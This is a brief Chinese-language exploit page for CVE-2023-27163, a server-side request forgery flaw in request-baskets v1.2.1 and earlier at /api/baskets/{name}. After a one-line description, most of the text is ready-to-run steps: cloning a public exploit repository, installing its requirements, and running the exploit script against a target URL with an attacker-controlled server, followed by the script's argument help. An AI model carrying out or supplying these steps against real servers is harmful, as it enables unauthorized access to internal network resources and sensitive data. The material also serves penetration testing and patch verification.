Request-Baskets v1.2.1 - 服务器端请求伪造(SSRF)
request-baskets 版本 v1.2.1 及之前被发现在组件 /api/baskets/{name} 中存在服务器端请求伪造(SSRF)漏洞。该漏洞允许攻击者通过精心构造的 API 请求访问网络资源和敏感信息。
git clone https://github.com/0xFTW/CVE-2023-27163
cd CVE-2023-27163
pip3 install -r requirements.txt
python3 CVE-2023-27163.py url attack_server
利用 Request Baskets 脚本
位置参数:
url 服务器的主路径(/)(例如 http://127.0.0.1:5000/) attack_server ATTACK_SERVER